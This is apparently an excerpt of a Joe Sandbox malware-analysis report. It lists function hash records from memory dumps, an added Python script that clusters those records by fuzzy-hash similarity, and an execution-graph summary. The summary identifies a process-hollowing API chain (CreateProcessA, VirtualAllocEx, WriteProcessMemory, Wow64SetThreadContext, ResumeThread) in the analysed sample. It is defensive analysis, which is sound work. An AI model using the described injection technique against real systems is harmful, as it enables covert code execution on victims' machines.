                                                • Opcode ID: a9c21ecc932c8c6ec3bc6b1f8142f105f5d02586013400b8628c68753ba5e336
                                                • Instruction ID: 195ef95e9a54cc2614699569ec451a5da789e1a0eb7d5714fec173bf2a98dea3
                                                • Opcode Fuzzy Hash: a9c21ecc932c8c6ec3bc6b1f8142f105f5d02586013400b8628c68753ba5e336
                                                • Instruction Fuzzy Hash: C8E1FAB4E102598FDB14DFA9C580AEEBBB2FF49305F24826AD415A7359D730AD42CF60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d15fee1a864e681dc074a486c8a5b2667975f063e455e2ea0a0a4eb52be7bbe6
                                                • Instruction ID: 3e2c6772e903853bc4bbdd36ea06d527295f511bbec70ae1e77d447561728786
                                                • Opcode Fuzzy Hash: d15fee1a864e681dc074a486c8a5b2667975f063e455e2ea0a0a4eb52be7bbe6
                                                • Instruction Fuzzy Hash: 5CE1FCB4E001698FDB14DFA9C584AEEBBB2FF89305F24826AD415A7355D730AD42CF60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc2c2d68b094b1d31847005a040a7f33192dfb12c8640ebcc104e9789193d7f5
                                                • Instruction ID: c72753a518f0eefb8b2bcdb46f4ed8f47be4e09e12a103fcda8bdfc289cf62a3
                                                • Opcode Fuzzy Hash: cc2c2d68b094b1d31847005a040a7f33192dfb12c8640ebcc104e9789193d7f5
                                                • Instruction Fuzzy Hash: 98D1E53592066BCADB10EB64D89069DF771FF95300F20D79AE14A7B610EFB06AC5CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83b3f0735f08a856e5a0f1f03235e9cd5ed5664f7799c3700b9775c9d6e89262
                                                • Instruction ID: f78ae3bd50c41e8b1425d717b93804f45ee2c0720c206e1717d96ea990d12cc8
                                                • Opcode Fuzzy Hash: 83b3f0735f08a856e5a0f1f03235e9cd5ed5664f7799c3700b9775c9d6e89262
                                                • Instruction Fuzzy Hash: AEA16D32E002068FCF16DFB6C94059EBBB2FF95300B15457AE905AB3A1DB75D91ACB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3298ff97e0a2dbbedd08f17e21875e7ddf8ee34d5b9191e896838e416a010b6c
                                                • Instruction ID: e8709615a47ebbcec6929d97cbbe67c475443cc43e04279c1c774a0f82c48da0
                                                • Opcode Fuzzy Hash: 3298ff97e0a2dbbedd08f17e21875e7ddf8ee34d5b9191e896838e416a010b6c
                                                • Instruction Fuzzy Hash: 0FD1F535D2066BCADB10EB64D89069DF771FF95300F20D79AE10A3B610EBB06AC5CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e19d2bb71b19e32caf2e1b53e55af69eb367c8d157bd76f033407924db6cf817
                                                • Instruction ID: 926532736473f3144347b743eae5812a13e4a98e287aed13282cd86592217cce
                                                • Opcode Fuzzy Hash: e19d2bb71b19e32caf2e1b53e55af69eb367c8d157bd76f033407924db6cf817
                                                • Instruction Fuzzy Hash: 3FA115B4F2520ACFCB44CFA9D9889AEFBF1FF85210F24956AD415AB214D370AE41CB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 485c1ce333a8068edc76174337dafeb4e8db497b67b5bc33bd71203887991389
                                                • Instruction ID: 6d21923ade2c9b0d27dc61e56d1d52f5c716bde62d867c849af1ce8a42812f89
                                                • Opcode Fuzzy Hash: 485c1ce333a8068edc76174337dafeb4e8db497b67b5bc33bd71203887991389
                                                • Instruction Fuzzy Hash: 05C125B0C81746ABD711CF65F8481897BB2BBC5324B954B09D1612BBE1DBBC186BCF44
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fd8f909832e66d8fe0caaa4b50a62ee5cf823261795e4d07681b32793211483
                                                • Instruction ID: 30fdb350f289ddc6285892ebbd80fa519a90e0f159e4259bed11e0b6454ae245
                                                • Opcode Fuzzy Hash: 2fd8f909832e66d8fe0caaa4b50a62ee5cf823261795e4d07681b32793211483
                                                • Instruction Fuzzy Hash: 7E81F4B4E25259CFCB44CFA9C98899EFBF1FF89310F14956AD415AB310D370AA42CB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddaf748bd9c783bbe26b6e870fc53fe611e93d9c3b03dcda5dc8323467c7f9e9
                                                • Instruction ID: 4f0cd618449669dc5ecfaa776fe2bf8e46a0c0b0df429fbfd0870a360570ddba
                                                • Opcode Fuzzy Hash: ddaf748bd9c783bbe26b6e870fc53fe611e93d9c3b03dcda5dc8323467c7f9e9
                                                • Instruction Fuzzy Hash: 7891B3B4E25219CFCB44CF99C98899EFBF1FB89210F14955AD415AB324D370AA42CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62c389e3b2237e0635058c50a28f425bd0a8eb19f04470876ee2caa2b0bfa824
                                                • Instruction ID: b6d799b6a19d5ba9600d61d10bf84a433c6cd3a5bc0ab07332ca9151fcaadf8e
                                                • Opcode Fuzzy Hash: 62c389e3b2237e0635058c50a28f425bd0a8eb19f04470876ee2caa2b0bfa824
                                                • Instruction Fuzzy Hash: A8811EB4D141698FDB14DFAAC5806AEFBB6FF89301F24826AD418A7215D7309E42CF61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53d5340b98ac464305b7e901213fc4f7f9911365c0a29aca8c337f6dfcadaede
                                                • Instruction ID: 42a5443a9ffc05d099f8da95f403b8097efb9c94df1d8f3c404d6e91809d992a
                                                • Opcode Fuzzy Hash: 53d5340b98ac464305b7e901213fc4f7f9911365c0a29aca8c337f6dfcadaede
                                                • Instruction Fuzzy Hash: 5C71F8B8E25609CFCB04CFA9C5845DEFBF2FF89210F25942AD415BB354D3749A818B68
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9dac4f856b9fc2160b4c05e7368036cdf0d904ff77fa317b7442e860d1f7ac87
                                                • Instruction ID: 09033f67ce79cab5f552aa07d415e56cbf2f3f7f55022691050b76165c284b3e
                                                • Opcode Fuzzy Hash: 9dac4f856b9fc2160b4c05e7368036cdf0d904ff77fa317b7442e860d1f7ac87
                                                • Instruction Fuzzy Hash: AA711AB4E25609CFCB04CFA9C5845DEFBF2FF89210F25942AD415B7354D3749A818B68
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b9e471eddf0dd9419ca0a15f2cc5a61401dbd7e748cddaf756e9b74849cdd9d5
                                                • Instruction ID: 02b438228d2ca5bd4b2ce8f0202657d1aa33ccc25cc3c722b1b2ea63e7009b29
                                                • Opcode Fuzzy Hash: b9e471eddf0dd9419ca0a15f2cc5a61401dbd7e748cddaf756e9b74849cdd9d5
                                                • Instruction Fuzzy Hash: DB413BB0E1560ADFCB14CFE6C5416EFFBF2BB99200F24946AC014B7264D3748B418BA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7767b84eedcfca83b1098741c6907c5240839186cdfd71efe4828db38dcb0b17
                                                • Instruction ID: 3a19da76973abf71c57f9fa351fb47e9de1736560ec951e72e6f4b2b216d7586
                                                • Opcode Fuzzy Hash: 7767b84eedcfca83b1098741c6907c5240839186cdfd71efe4828db38dcb0b17
                                                • Instruction Fuzzy Hash: C84109B4E2521ADBCB44CFA9C5855AEFBF2FF88300F60D56AC405B7314D7749A818BA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 662393916bb5d67b0eea38f6fce23d03f9be132a07c0012f112bc70c32d942aa
                                                • Instruction ID: 03c334b051a54b3054923cce15806c0714d3551c48dbdf9ef801c9dfb501b714
                                                • Opcode Fuzzy Hash: 662393916bb5d67b0eea38f6fce23d03f9be132a07c0012f112bc70c32d942aa
                                                • Instruction Fuzzy Hash: 46412BB4E2521ADFCB04CFA9C5855AEFBF2FF88300F64C56AC404A7254D7749A818BA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d57ef6e02ef80f4b5d45cc116d668292d2bb71950b53bf66f7e282e08c156d82
                                                • Instruction ID: 3677981b028975cb7e1e23f13394ce4c8ef99a9cdd83cb0caa9ed6ec6bb09297
                                                • Opcode Fuzzy Hash: d57ef6e02ef80f4b5d45cc116d668292d2bb71950b53bf66f7e282e08c156d82
                                                • Instruction Fuzzy Hash: C9410DB0E1560ADFCB54CFE6C5416EEFBF1BB99200F10986AC015B7264D3749B428BA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b3ad17a4b636d16c7f165450f99dab364782cf29a8ac17f410db8e9ec5b0456
                                                • Instruction ID: ef7c0f1e4b6b7535907b7941a8d81933890fdc9d73bcca89f2f3ae2da1f4a0b6
                                                • Opcode Fuzzy Hash: 1b3ad17a4b636d16c7f165450f99dab364782cf29a8ac17f410db8e9ec5b0456
                                                • Instruction Fuzzy Hash: B84139B4E2460ADFCB04CFAAD4855AEFBF2BF89200F14C56AC415A7254D3349A82CF90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 744c82f0fa1e09b9626a8672a02012c27e08af825a81ce96e79c09e0541bf6bf
                                                • Instruction ID: 2c085345c295706d0b4b9b028ca6d15ef11c27f7c99b5b5b1cdb56672d364371
                                                • Opcode Fuzzy Hash: 744c82f0fa1e09b9626a8672a02012c27e08af825a81ce96e79c09e0541bf6bf
                                                • Instruction Fuzzy Hash: C44107B4E2420ADFDB04CFAAD5855AEFBF2BF89300F14C52AC415B7214D7749A818F94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de7873030230294a1c31f14bce606037d4ecced00146f14dd84c0d71ede4d6fc
                                                • Instruction ID: c5bc5c85931bdad36ac2558dc7e8b03b5a7b96fb40b3bee5db7c40b6280a4564
                                                • Opcode Fuzzy Hash: de7873030230294a1c31f14bce606037d4ecced00146f14dd84c0d71ede4d6fc
                                                • Instruction Fuzzy Hash: AD210EB1E106589BEB18CFAB98446DEFBF3AFC9200F18C17BC418A6254EB3406468F11
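
The function records above carry two kinds of identifier: exact ones (Opcode ID, Instruction ID) and fuzzy ones (Opcode Fuzzy Hash, Instruction Fuzzy Hash). Several records from the 074B0000 region have Instruction Fuzzy Hashes that differ in only a handful of nibbles (for example 86E10DB4E101698F…, C8E1FAB4E102598F… and 5CE1FCB4E001698F…), which is what you expect when the same function is captured in successive snapshots of decrypted code. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin: it reads records in this bullet format and groups functions whose fuzzy hashes agree on most positions. The sample input is a subset of five records copied from above, trimmed to the fields the example uses; the position-wise nibble comparison and the 0.85 threshold are assumptions for illustration, not Joe Sandbox's own similarity metric.

```python
import re
from itertools import combinations

# Sample input: five "Memory Dump Source" records copied from the report above, trimmed
# to the fields this example uses (the parser ignores bullets it does not know about).
# The first three are successive snapshots of the same function in the 074B0000 region.
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
• Opcode ID: 1d1fdadcf90c0c13145f00a9cf02c4a276d23126e416acb8c42bdc416a66bcfc
• Instruction Fuzzy Hash: 86E10DB4E101698FDB14DFA9C580AEEBBB2FF89305F24826AD415A7355D730AD42CF60
Memory Dump Source
• Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
• Opcode ID: a9c21ecc932c8c6ec3bc6b1f8142f105f5d02586013400b8628c68753ba5e336
• Instruction Fuzzy Hash: C8E1FAB4E102598FDB14DFA9C580AEEBBB2FF49305F24826AD415A7359D730AD42CF60
Memory Dump Source
• Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
• Opcode ID: d15fee1a864e681dc074a486c8a5b2667975f063e455e2ea0a0a4eb52be7bbe6
• Instruction Fuzzy Hash: 5CE1FCB4E001698FDB14DFA9C584AEEBBB2FF89305F24826AD415A7355D730AD42CF60
Memory Dump Source
• Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
• Opcode ID: cc2c2d68b094b1d31847005a040a7f33192dfb12c8640ebcc104e9789193d7f5
• Instruction Fuzzy Hash: 98D1E53592066BCADB10EB64D89069DF771FF95300F20D79AE14A7B610EFB06AC5CB90
Memory Dump Source
• Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
• Opcode ID: 83b3f0735f08a856e5a0f1f03235e9cd5ed5664f7799c3700b9775c9d6e89262
• Instruction Fuzzy Hash: AEA16D32E002068FCF16DFB6C94059EBBB2FF95300B15457AE905AB3A1DB75D91ACB40
"""

FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
SOURCE_RE = re.compile(r"^(\S+?),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(\w+)")


def parse_records(text):
    """Split the bullet list into one dict per 'Memory Dump Source' record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        m = FIELD_RE.match(line)
        if not m or cur is None:
            continue
        key = m.group(1).strip().lower().replace(" ", "_")
        value = m.group(2).strip()
        if key == "source_file":
            sm = SOURCE_RE.match(value)
            cur["source"], cur["offset"] = sm.group(1), int(sm.group(2), 16)
            cur["based_on_pe"] = sm.group(3).lower() == "true"
        else:
            cur[key] = value
    return records


def fuzzy_similarity(a, b):
    """Fraction of nibble positions on which two fuzzy hashes agree.
    Position-wise comparison is an assumption for this example, not Joe Sandbox's metric."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a.upper(), b.upper())) / len(a)


def cluster_by_fuzzy_hash(records, threshold=0.85):
    """Union-find over pairs whose Instruction Fuzzy Hashes agree on >= threshold of positions.
    Returns clusters (largest first) as lists of Opcode ID prefixes."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]   # path halving
            i = parent[i]
        return i

    for i, j in combinations(range(len(records)), 2):
        sim = fuzzy_similarity(records[i]["instruction_fuzzy_hash"], records[j]["instruction_fuzzy_hash"])
        if sim >= threshold:
            parent[find(i)] = find(j)
    groups = {}
    for i, rec in enumerate(records):
        groups.setdefault(find(i), []).append(rec["opcode_id"][:12])
    return sorted(groups.values(), key=len, reverse=True)


if __name__ == "__main__":
    for cluster in cluster_by_fuzzy_hash(parse_records(SAMPLE_RECORDS)):
        print(len(cluster), cluster)
```

With the five sample records the three 074B0000 snapshots land in one cluster (pairwise agreement 62/70, 64/70 and 61/70) while the 05460000 and 01400000 functions stay separate; that is the grouping you want before comparing one function's decompilation across snapshots rather than re-analysing each copy.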

                                                Execution Graph

                                                 Execution Coverage: 11.9%
                                                 Dynamic/Decrypted Code Coverage: 100%
                                                 Signature Coverage: 0%
                                                 Total number of Nodes: 279
                                                 Total number of Limit Nodes: 27
                                                 execution_graph (rendered node/edge dump of the call graph; the node ids and edges are omitted here and only the API calls reachable in the graph are kept, grouped by the memory region that contains the calling function)
                                                 • 70dexxx region, reached from 780faea through the eb90xxx stubs: CreateProcessA (70dee70), VirtualAllocEx (70deb28), WriteProcessMemory (70debe8), ReadProcessMemory (70decd8), Wow64SetThreadContext (70de618), ResumeThread (70de130). This is the complete primitive set for injecting a PE image into a freshly created foreign process and redirecting its main thread (process hollowing).
                                                 • 70d2xxx region: VirtualProtect (70d2770 / 70d2778 / 70d2827), called from 70d046c, 70d09fe, 70d0aee, 70d0b4d, 70d0e0b, 70d1179 and 70d1c82, which are all reached from 7809b0a.
                                                 • 15bxxxx region: GetModuleHandleW (15bafa0, reached from 15baf58), CreateActCtxA (15b58f8, reached through 15b44b0 from 15b4668).
                                                 • 780xxxx region: DrawTextExW (7803498 / 78034a8 / 7803518 / 7803528 / 7801f58 / 780207c), CreateIconFromResourceEx (78020cc / 780510f / 7805120).
VirtualProtect 33752->33753 33756 70d282b 33752->33756 33755 70d27fa 33753->33755 33755->33711 33756->33711 33456 15bd650 DuplicateHandle 33457 15bd6e6 33456->33457 33637 15bd000 33638 15bd046 GetCurrentProcess 33637->33638 33640 15bd098 GetCurrentThread 33638->33640 33641 15bd091 33638->33641 33642 15bd0ce 33640->33642 33643 15bd0d5 GetCurrentProcess 33640->33643 33641->33640 33642->33643 33646 15bd10b 33643->33646 33644 15bd133 GetCurrentThreadId 33645 15bd164 33644->33645 33646->33644 33458 70d2880 33459 70d28a7 33458->33459 33463 70d2b58 33459->33463 33469 70d2b4b 33459->33469 33460 70d291e 33464 70d2b7f 33463->33464 33465 70d2dac 33464->33465 33475 eb90f10 33464->33475 33480 eb90f37 33464->33480 33485 eb90f00 33464->33485 33465->33460 33471 70d2b7f 33469->33471 33470 70d2dac 33470->33460 33471->33470 33472 eb90f10 2 API calls 33471->33472 33473 eb90f00 2 API calls 33471->33473 33474 eb90f37 2 API calls 33471->33474 33472->33471 33473->33471 33474->33471 33476 eb90f11 33475->33476 33478 eb90f30 33476->33478 33479 eb90f37 2 API calls 33476->33479 33490 eb90f78 33476->33490 33478->33464 33479->33478 33481 eb90f11 33480->33481 33482 eb90f30 33481->33482 33483 eb90f78 2 API calls 33481->33483 33484 eb90f37 2 API calls 33481->33484 33482->33464 33483->33482 33484->33482 33486 eb90f19 33485->33486 33487 eb90f30 33486->33487 33488 eb90f78 2 API calls 33486->33488 33489 eb90f37 2 API calls 33486->33489 33487->33464 33488->33487 33489->33487 33491 eb90f51 33490->33491 33492 eb90f7b 33490->33492 33491->33478 33492->33491 33495 eb91208 PostMessageW 33492->33495 33497 eb91200 PostMessageW 33492->33497 33496 eb91274 33495->33496 33496->33492 33498 eb91274 33497->33498 33498->33492

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 015BD07E
                                                • GetCurrentThread.KERNEL32 ref: 015BD0BB
                                                • GetCurrentProcess.KERNEL32 ref: 015BD0F8
                                                • GetCurrentThreadId.KERNEL32 ref: 015BD151
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 015BD07E
                                                • GetCurrentThread.KERNEL32 ref: 015BD0BB
                                                • GetCurrentProcess.KERNEL32 ref: 015BD0F8
                                                • GetCurrentThreadId.KERNEL32 ref: 015BD151
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0

                                                Control-flow Graph

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070DF0A6
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0

                                                Control-flow Graph

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 015B59A9
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2204789724.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7800000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0

                                                Control-flow Graph

                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07803FBD,?,?), ref: 0780406F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2204789724.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7800000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0

                                                Control-flow Graph

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070DEC78
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0

                                                Control-flow Graph

                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07803FBD,?,?), ref: 0780406F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2204789724.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7800000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0

                                                Control-flow Graph

                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 070D27EB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0

                                                Control-flow Graph

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015BD6D7
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0

                                                Control-flow Graph

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070DE696
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070DED58
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015BD6D7
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                APIs
                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,078050EA,?,?,?,?,?), ref: 0780518F
                                                Memory Dump Source
